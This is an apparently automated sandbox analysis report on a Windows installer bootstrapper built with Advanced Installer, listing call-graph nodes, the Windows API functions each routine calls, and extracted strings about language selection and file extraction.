CloseHandle 96146->96149 96179 2d97af 96146->96179 96152 2d98dd 96147->96152 96153 2d98e4 WaitForSingleObject GetExitCodeThread 96147->96153 96321 2f4440 133 API calls 96147->96321 96154 2d989a 96148->96154 96149->96179 96150 2d998e 96157 2a0ef0 13 API calls 96150->96157 96151 2d9984 CloseHandle 96151->96150 96152->96153 96155 2d98fc 96153->96155 96156 2d9924 96153->96156 96154->96147 96155->96146 96158 2d9912 CloseHandle 96155->96158 96156->96146 96159 2d9933 CloseHandle 96156->96159 96168 2d99c3 std::ios_base::_Ios_base_dtor 96157->96168 96158->96146 96159->96146 96160 2d9a40 96163 352fcd ___vcrt_freefls@4 13 API calls 96160->96163 96164 2d9a51 96160->96164 96161 2d9af8 96231 1c7340 RaiseException 96161->96231 96163->96164 96165 34933a _ValidateLocalCookies 5 API calls 96164->96165 96167 2d9ae4 96165->96167 96166 2f41e0 2 API calls 96166->96168 96168->96160 96168->96161 96168->96166 96170 1b9e20 51 API calls 96170->96184 96171 2ab9f0 53 API calls 96171->96184 96172 2ab9f0 53 API calls 96182 2d962d std::locale::_Setgloballocale 96172->96182 96174 2d9656 FindFirstFileW 96176 2d969a FindClose 96174->96176 96174->96182 96175 1cfdb0 42 API calls 96175->96184 96176->96182 96178 1cfdb0 42 API calls 96178->96182 96179->96150 96179->96151 96180 2f4360 134 API calls 96180->96182 96181 2d97b8 96181->96179 96182->96172 96182->96174 96182->96178 96182->96180 96182->96181 96182->96184 96183 2b66d0 109 API calls 96183->96184 96184->96126 96184->96140 96184->96161 96184->96170 96184->96171 96184->96175 96184->96179 96184->96182 96184->96183 96185 2b4240 44 API calls 96184->96185 96186 2d97ad 96184->96186 96187 2f42c0 96184->96187 96223 2b5760 69 API calls _wcsrchr 96184->96223 96224 2f4360 CreateFileW 96184->96224 96185->96184 96193 2f5320 96186->96193 96188 2f42ce LoadLibraryW 96187->96188 96189 2f42c9 96187->96189 96190 2f42e7 96188->96190 96189->96184 96191 2f4307 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 96190->96191 96192 2f4301 96190->96192 96191->96184 96192->96184 96194 2f5358 CreateEventW 96193->96194 96195 2f5386 CreateThread 96193->96195 96196 2f536d 96194->96196 96197 2f549c WaitForSingleObject GetExitCodeThread 96195->96197 96205 2f53c2 96195->96205 96317 2f56e0 96195->96317 96196->96195 96198 2f54c9 CloseHandle 96197->96198 96199 2f54d7 96197->96199 96198->96199 96199->96144 96200 2f5480 96218 2f0d10 88 API calls 96200->96218 96219 2f0e70 88 API calls 96200->96219 96220 2f0f60 88 API calls 96200->96220 96201 2f54ed 96232 1c7340 RaiseException 96201->96232 96203 2f54f9 96206 2f5531 WaitForSingleObject 96203->96206 96208 2f553a 96203->96208 96204 2f548f 96204->96197 96205->96200 96205->96201 96206->96208 96207 2f56cf 96233 1c7340 RaiseException 96207->96233 96208->96207 96216 2f5697 96208->96216 96217 2f5587 96208->96217 96247 2d7bd0 96208->96247 96211 2f56db 96234 2f5500 96211->96234 96212 1bcaf0 61 API calls 96212->96217 96214 2b66d0 109 API calls 96214->96217 96215 2f56e9 96215->96144 96216->96144 96217->96207 96217->96212 96217->96214 96217->96216 96218->96204 96219->96204 96220->96204 96221->96137 96222->96134 96223->96184 96225 2f438d 96224->96225 96226 2f4409 96225->96226 96227 1b9ae0 2 API calls 96225->96227 96226->96184 96228 2f443b 96227->96228 96320 2f4450 133 API calls ___vcrt_freefls@4 96228->96320 96230 2f4449 96230->96184 96231->96126 96232->96203 96233->96211 96235 2f5531 WaitForSingleObject 96234->96235 96237 2f553a 96234->96237 96235->96237 96236 2f56cf 96307 1c7340 RaiseException 96236->96307 96237->96236 96239 2d7bd0 126 API calls 96237->96239 96245 2f5697 96237->96245 96246 2f5587 96237->96246 96239->96237 96240 2f56db 96242 2f5500 126 API calls 96240->96242 96241 1bcaf0 61 API calls 96241->96246 96244 2f56e9 96242->96244 96243 2b66d0 109 API calls 96243->96246 96244->96215 96245->96215 96246->96236 96246->96241 96246->96243 96246->96245 96274 2d7b60 96247->96274 96248 1b9ae0 RtlAllocateHeap RaiseException 96248->96274 96249 1b9620 42 API calls 96249->96274 96250 2ab9f0 53 API calls 96250->96274 96251 1bcaf0 61 API calls 96251->96274 96252 1c7340 RaiseException 96252->96274 96254 1c3080 2 API calls 96254->96274 96255 2d7d21 GetLastError 96309 2b9370 75 API calls 96255->96309 96257 2e3330 6 API calls 96257->96274 96258 2d7d38 96259 2b62a0 69 API calls 96258->96259 96260 2d7d4c 96259->96260 96310 2c4d10 73 API calls 96260->96310 96261 1b9e20 51 API calls 96261->96274 96263 2b4240 44 API calls 96263->96274 96264 2b66d0 109 API calls 96266 2d7ef4 CreateFileW 96264->96266 96265 2b62a0 69 API calls 96265->96274 96269 2d7f2c GetLastError 96266->96269 96270 2d8070 SetFilePointer 96266->96270 96267 2d7ba3 96267->96208 96268 2d7dde 96276 1cf3c0 83 API calls 96268->96276 96311 2b9370 75 API calls 96269->96311 96271 2d8099 GetLastError 96270->96271 96270->96274 96314 2b9370 75 API calls 96271->96314 96274->96247 96274->96248 96274->96249 96274->96250 96274->96251 96274->96252 96274->96254 96274->96255 96274->96257 96274->96261 96274->96263 96274->96264 96274->96265 96274->96267 96274->96268 96279 2d816a ReadFile 96274->96279 96284 2d8231 96274->96284 96286 2d81af WriteFile 96274->96286 96296 2d7fab 96274->96296 96304 2d8039 96274->96304 96308 2b68f0 77 API calls _wcschr 96274->96308 96312 2c4d10 73 API calls 96274->96312 96275 2d80b3 96277 2b62a0 69 API calls 96275->96277 96278 2d7dfc 96276->96278 96280 2d80c8 96277->96280 96281 2ab9f0 53 API calls 96278->96281 96279->96274 96315 2c4d10 73 API calls 96280->96315 96283 2d7e0a 96281->96283 96283->96267 96290 1cf3c0 83 API calls 96283->96290 96287 2d823e FindCloseChangeNotification 96284->96287 96288 2d8249 96284->96288 96286->96274 96287->96288 96289 2d8272 CreateFileW 96288->96289 96288->96304 96291 2d82a9 96289->96291 96292 2d82d2 96289->96292 96290->96267 96295 2d82f4 CloseHandle 96291->96295 96291->96304 96316 2dab50 41 API calls 4 library calls 96292->96316 96294 2d8326 CloseHandle 96294->96267 96295->96304 96297 1cf3c0 83 API calls 96296->96297 96300 2d7fc9 96297->96300 96298 2d7fee 96299 1cf3c0 83 API calls 96298->96299 96301 2d7ffd GetLastError 96299->96301 96300->96298 96302 1cf3c0 83 API calls 96300->96302 96313 2b9370 75 API calls 96301->96313 96302->96298 96304->96267 96304->96294 96305 2d800e 96305->96304 96306 1cf3c0 83 API calls 96305->96306 96306->96304 96307->96240 96308->96274 96309->96258 96310->96267 96311->96274 96312->96274 96313->96305 96314->96275 96315->96304 96316->96291 96318 2f5500 127 API calls 96317->96318 96319 2f56e9 96318->96319 96320->96230 96322 2d1310 96383 2d2400 272 API calls 4 library calls 96322->96383 96324 2d1345 96384 2d5740 71 API calls _ValidateLocalCookies 96324->96384 96326 2d134d 96351 2dbdd0 96326->96351 96329 2d5c70 108 API calls 96330 2d1366 96329->96330 96331 2d136a 96330->96331 96360 2c19a0 54 API calls 96330->96360 96333 2d1394 96361 2ce010 96333->96361 96352 1cfdb0 42 API calls 96351->96352 96353 2dbdff 96352->96353 96354 1cfdb0 42 API calls 96353->96354 96355 2dbe0b 96354->96355 96385 2bf720 96355->96385 96357 2dbe13 96358 1b8d10 73 API calls 96357->96358 96359 2d135f 96358->96359 96359->96329 96360->96333 96408 2d5f70 96361->96408 96364 2ce187 96380 2c2cb0 96364->96380 96365 2ce063 CreateFileW 96366 2ce0a1 SetFilePointer 96365->96366 96368 2ce090 96365->96368 96367 2ce0ce 96366->96367 96366->96368 96438 299630 53 API calls 2 library calls 96367->96438 96368->96364 96369 2ce17a FindCloseChangeNotification 96368->96369 96369->96364 96371 2ce0dd 96372 2ce0f8 ReadFile 96371->96372 96373 2ce0ea 96371->96373 96375 2ce11d 96372->96375 96376 2ce10b 96372->96376 96439 1b9790 42 API calls 96373->96439 96375->96368 96379 2ce14a 96375->96379 96376->96375 96440 2ed900 79 API calls 96376->96440 96377 2ce0f5 96377->96372 96379->96364 96381 2c2cee 96380->96381 96444 2c2ed0 96381->96444 96383->96324 96384->96326 96386 1b9620 42 API calls 96385->96386 96387 2bf75f 96386->96387 96390 2bf77d 96387->96390 96404 1b9790 42 API calls 96387->96404 96389 2bf7c7 96391 2bf7a5 96389->96391 96393 1b9e20 51 API calls 96389->96393 96390->96389 96390->96391 96405 1b9790 42 API calls 96390->96405 96391->96357 96394 2bf7e6 96393->96394 96395 2bf930 96394->96395 96398 2bf7f0 96394->96398 96396 1b9ae0 2 API calls 96395->96396 96397 2bf93a 96396->96397 96399 1b8d10 73 API calls 96398->96399 96400 2bf848 96399->96400 96403 2bf85f 96400->96403 96406 1b9790 42 API calls 96400->96406 96403->96391 96407 1b9990 42 API calls 3 library calls 96403->96407 96404->96390 96405->96389 96406->96403 96407->96391 96409 2d6017 96408->96409 96410 2d5fd3 96408->96410 96412 2d7950 RaiseException 96409->96412 96441 2d78f0 RaiseException 96410->96441 96414 2d601e 96412->96414 96413 2d5fdc 96415 2d60da 96413->96415 96416 2d5fe6 96413->96416 96414->96415 96417 2d6026 96414->96417 96420 1b9e20 51 API calls 96415->96420 96418 2d5fef 96416->96418 96419 2d6133 96416->96419 96417->96419 96421 2d6032 96417->96421 96423 1b9620 42 API calls 96418->96423 96443 1c7340 RaiseException 96419->96443 96424 2d60ee 96420->96424 96442 2d79a0 83 API calls 96421->96442 96427 2d600d 96423->96427 96426 2d613f 96424->96426 96424->96427 96429 1b9ae0 2 API calls 96426->96429 96433 34933a _ValidateLocalCookies 5 API calls 96427->96433 96428 2d6047 FindFirstFileW 96430 2d6079 96428->96430 96432 2d6149 96429->96432 96431 1b9620 42 API calls 96430->96431 96434 2d6089 96431->96434 96435 2ce04c 96433->96435 96436 2d60a8 FindClose 96434->96436 96437 2d60b6 96434->96437 96435->96364 96435->96365 96436->96437 96437->96427 96438->96371 96439->96377 96440->96375 96441->96413 96442->96428 96443->96426 96445 1b9e20 51 API calls 96444->96445 96446 2c2f05 96445->96446 96449 1b9e20 51 API calls 96446->96449 96492 2c3106 96446->96492 96447 1b9ae0 2 API calls 96448 2c313b 96447->96448 96461 2c318f 96448->96461 96514 2c3410 100 API calls _ValidateLocalCookies 96448->96514 96451 2c2f2b 96449->96451 96450 2c33e3 96452 34933a _ValidateLocalCookies 5 API calls 96450->96452 96458 1b9e20 51 API calls 96451->96458 96451->96492 96455 2c33fd 96452->96455 96454 2c3401 96517 1c7340 RaiseException 96454->96517 96457 2c340d 96459 2c2f4e 96458->96459 96463 1b9e20 51 API calls 96459->96463 96459->96492 96461->96450 96461->96454 96494 2c28a0 96461->96494 96516 2c1f10 RaiseException 96461->96516 96465 2c2f71 96463->96465 96469 1b9e20 51 API calls 96465->96469 96465->96492 96492->96447 96493 2c310a 96492->96493 96495 2c298c 96494->96495 96496 2c28d7 96494->96496 96515 2e0140 84 API calls _wcschr 96495->96515 96497 2c2974 96496->96497 96518 2c94e0 96496->96518 96514->96448 96517->96457
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9120: FindResourceW.KERNEL32(00000000,?,00000006,-00000010,?,?,001BCB50,-00000010,?,002F55F7,00000008,DF534560), ref: 001B9143
                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,00000001), ref: 002CFDE7
                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 002CFE45
                                                                                                                                                                                                                                                                            • Part of subcall function 002DA670: DeleteFileW.KERNEL32(?,00000000,00000000,?,00000000,80004005,?,?,?,DF534560), ref: 002DA69B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EventInit_thread_footer$DeleteFileFindHeapProcessResource
                                                                                                                                                                                                                                                                          • String ID: %hu$A valid language was received from commnad line. This is:$AI_BOOTSTRAPPERLANGS$Advinst_Extract_$Code returned to Windows by setup:$Language of a related product is:$Language selected programatically for UI:$Language used for UI:$Languages of setup:$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$Software\Caphyon\Advanced Installer\$f_4
                                                                                                                                                                                                                                                                          • API String ID: 4144826820-1104767274
                                                                                                                                                                                                                                                                          • Opcode ID: 9bb82bc6fc306e01bba0f1cab91e0ced32ada6ee667cb7ae76d2b786d691078e
                                                                                                                                                                                                                                                                          • Instruction ID: efb5cc3507a204307f71686729f4bc04846afdae5c397b0aaac870c32ba067a4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9bb82bc6fc306e01bba0f1cab91e0ced32ada6ee667cb7ae76d2b786d691078e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97E2B23090064ADFDB00DFA8C849BAEF7B5EF55314F1482A9E515AB3A2DB74DD05CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer$HeapProcess
                                                                                                                                                                                                                                                                          • String ID: t=$t=$t=
                                                                                                                                                                                                                                                                          • API String ID: 275895251-220515560
                                                                                                                                                                                                                                                                          • Opcode ID: c2ec070a242080e0f4583ee546e2b1cf836bab4c45e614d1f7d360dd391c35f1
                                                                                                                                                                                                                                                                          • Instruction ID: 9db594b538cda254ac7190c8606fd06f72974265d5c76a45db4fa1298c258951
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2ec070a242080e0f4583ee546e2b1cf836bab4c45e614d1f7d360dd391c35f1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38628D7091064ADFDB11CFA8C888BDEBBB4BF05314F14829AE415AB391DB70AD95CF90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001CF4D2
                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,00000000,*.*), ref: 001CF77E
                                                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 001CF798
                                                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00000000,?,00000000), ref: 001CF7CB
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001CF83C
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007B), ref: 001CF846
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 001CF89C
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 001CF8BC
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Find$CloseFullNamePath_wcsrchr$ErrorFileFirstLast
                                                                                                                                                                                                                                                                          • String ID: *.*$:e+$\\?\$\\?\UNC\
                                                                                                                                                                                                                                                                          • API String ID: 3417489732-1865778561
                                                                                                                                                                                                                                                                          • Opcode ID: 5856100e594ea40a3c6a1eaba1e2de8ba0d019f8acff4384d4c597a64e3132d1
                                                                                                                                                                                                                                                                          • Instruction ID: 844da46b070913177a8a4021159d828e0f0eb57647754cb47240f5be65fec785
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5856100e594ea40a3c6a1eaba1e2de8ba0d019f8acff4384d4c597a64e3132d1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D162D371A006159FDB14DF68C889FAEB7A6FF64314F14827DE815DB2A1DB31E902CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 2082 6a55b570-6a55b5ca call 6a56d354 2085 6a55b5cc-6a55b5cf 2082->2085 2086 6a55b5de-6a55b5e6 2082->2086 2085->2086 2087 6a55b5d1-6a55b5d8 FindClose 2085->2087 2088 6a55b5ed-6a55b620 call 6a5476d0 call 6a5492e0 2086->2088 2089 6a55b5e8-6a55b5ea 2086->2089 2087->2086 2094 6a55b626-6a55b62c 2088->2094 2095 6a55b85b 2088->2095 2089->2088 2097 6a55b784-6a55b796 FindFirstFileW 2094->2097 2098 6a55b632-6a55b641 PathIsUNCW 2094->2098 2096 6a55b85d-6a55b875 2095->2096 2102 6a55b877-6a55b87a 2096->2102 2103 6a55b87f-6a55b892 2096->2103 2097->2095 2101 6a55b79c-6a55b7af GetFullPathNameW 2097->2101 2099 6a55b715-6a55b726 call 6a55bc70 2098->2099 2100 6a55b647-6a55b65a call 6a55bc70 2098->2100 2115 6a55b728-6a55b72e 2099->2115 2113 6a55b660-6a55b666 2100->2113 2105 6a55b7b5-6a55b7c6 2101->2105 2106 6a55b961-6a55b96b call 6a547ad0 2101->2106 2102->2103 2110 6a55b7d0-6a55b7e7 GetFullPathNameW 2105->2110 2111 6a55b7c8-6a55b7cb call 6a547860 2105->2111 2116 6a55b7ed-6a55b7fd call 6a576036 2110->2116 2117 6a55b7e9-6a55b7eb 2110->2117 2111->2110 2119 6a55b686-6a55b688 2113->2119 2120 6a55b668-6a55b66b 2113->2120 2121 6a55b730-6a55b733 2115->2121 2122 6a55b74e-6a55b750 2115->2122 2116->2106 2124 6a55b803-6a55b808 2116->2124 2117->2124 2128 6a55b68b-6a55b6a0 2119->2128 2126 6a55b682-6a55b684 2120->2126 2127 6a55b66d-6a55b675 2120->2127 2129 6a55b735-6a55b73d 2121->2129 2130 6a55b74a-6a55b74c 2121->2130 2131 6a55b753-6a55b768 2122->2131 2124->2106 2125 6a55b80e-6a55b81b 2124->2125 2133 6a55b895-6a55b89b 2125->2133 2134 6a55b81d-6a55b83f call 6a56d354 2125->2134 2126->2128 2127->2119 2135 6a55b677-6a55b680 2127->2135 2137 6a55b6a2-6a55b6a5 2128->2137 2138 6a55b6aa-6a55b6ac 2128->2138 2129->2122 2136 6a55b73f-6a55b748 2129->2136 2130->2131 2139 6a55b772-6a55b774 2131->2139 2140 6a55b76a-6a55b76d 2131->2140 2143 6a55b8a7-6a55b8bb call 6a56e6b5 2133->2143 2144 6a55b89d-6a55b8a2 call 6a547780 2133->2144 2152 6a55b841-6a55b844 2134->2152 2153 6a55b853-6a55b855 SetLastError 2134->2153 2135->2113 2135->2126 2136->2115 2136->2130 2137->2138 2138->2097 2145 6a55b6b2-6a55b704 call 6a55be40 call 6a547470 2138->2145 2139->2097 2142 6a55b776 2139->2142 2140->2139 2148 6a55b77b-6a55b77f call 6a55bd10 2142->2148 2157 6a55b8c7-6a55b8d8 call 6a56e6b5 2143->2157 2158 6a55b8bd-6a55b8c2 call 6a547780 2143->2158 2144->2143 2163 6a55b706-6a55b709 2145->2163 2164 6a55b70e-6a55b713 2145->2164 2148->2097 2152->2153 2159 6a55b846-6a55b84d FindClose 2152->2159 2153->2095 2166 6a55b8f4-6a55b8f6 2157->2166 2167 6a55b8da-6a55b8dc 2157->2167 2158->2157 2159->2153 2163->2164 2164->2148 2170 6a55b90f-6a55b911 2166->2170 2171 6a55b8f8-6a55b8fe 2166->2171 2168 6a55b94d-6a55b95c 2167->2168 2169 6a55b8de-6a55b8e4 2167->2169 2168->2096 2174 6a55b8e6-6a55b8eb call 6a547780 2169->2174 2175 6a55b8f0-6a55b8f2 2169->2175 2172 6a55b913-6a55b918 2170->2172 2173 6a55b91a-6a55b91c 2170->2173 2176 6a55b900-6a55b90a call 6a547780 2171->2176 2177 6a55b90d 2171->2177 2178 6a55b91f-6a55b923 2172->2178 2173->2178 2174->2175 2175->2170 2176->2177 2177->2170 2182 6a55b925-6a55b927 2178->2182 2183 6a55b929-6a55b939 call 6a576036 2178->2183 2184 6a55b93b-6a55b940 2182->2184 2183->2106 2183->2184 2184->2106 2187 6a55b942-6a55b949 2184->2187 2187->2168
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000,7FFFFFFE,6A5D5C04,?), ref: 6A55B5D2
                                                                                                                                                                                                                                                                          • PathIsUNCW.SHLWAPI(6A5D5C04,*.*,7FFFFFFE,6A5D5C04), ref: 6A55B633
                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(6A5D5C04,?,*.*,7FFFFFFE,6A5D5C04), ref: 6A55B78B
                                                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6A55B7A5
                                                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,?,00000000), ref: 6A55B7D8
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 6A55B847
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007B), ref: 6A55B855
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 6A55B8AB
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 6A55B8CB
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FindPath$CloseFullName_wcsrchr$ErrorFileFirstLast
                                                                                                                                                                                                                                                                          • String ID: *.*$\\?\$\\?\UNC\
                                                                                                                                                                                                                                                                          • API String ID: 726989864-1700010636
                                                                                                                                                                                                                                                                          • Opcode ID: 8be020b9dacda96fc5f4251eeb3af0e015c899df76c4913aa34a187e70646611
                                                                                                                                                                                                                                                                          • Instruction ID: a3095aef8ef793d01d475bb8c0f0a3b8072d3e08f0f5fcb0356d85b5c680a051
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8be020b9dacda96fc5f4251eeb3af0e015c899df76c4913aa34a187e70646611
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EC1C270600605EFDB05EF68C99CB59B7F5EF45314F12822AE925DB2A2EF31A924CB50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 2276 2f42c0-2f42c7 2277 2f42ce-2f42e5 LoadLibraryW 2276->2277 2278 2f42c9-2f42cb 2276->2278 2279 2f42fd-2f42ff 2277->2279 2280 2f42e7-2f42f7 2277->2280 2281 2f4307-2f4359 GetProcAddress * 4 2279->2281 2282 2f4301-2f4304 2279->2282 2280->2279
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,00000000,002D93DB,?,?,?,?,?), ref: 002F42D5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                          • String ID: EndExtraction$ExtractAllFiles$GetTotalFilesSize$InitExtraction
                                                                                                                                                                                                                                                                          • API String ID: 1029625771-3462492388
                                                                                                                                                                                                                                                                          • Opcode ID: 58106f669088608c9cbd8598d99cc0fc5f29460e3933b52be5d089bc7a8552cf
                                                                                                                                                                                                                                                                          • Instruction ID: 66b345f8b38d1a74394569a3378c48ffda22fc153a793ca149e13083457923fd
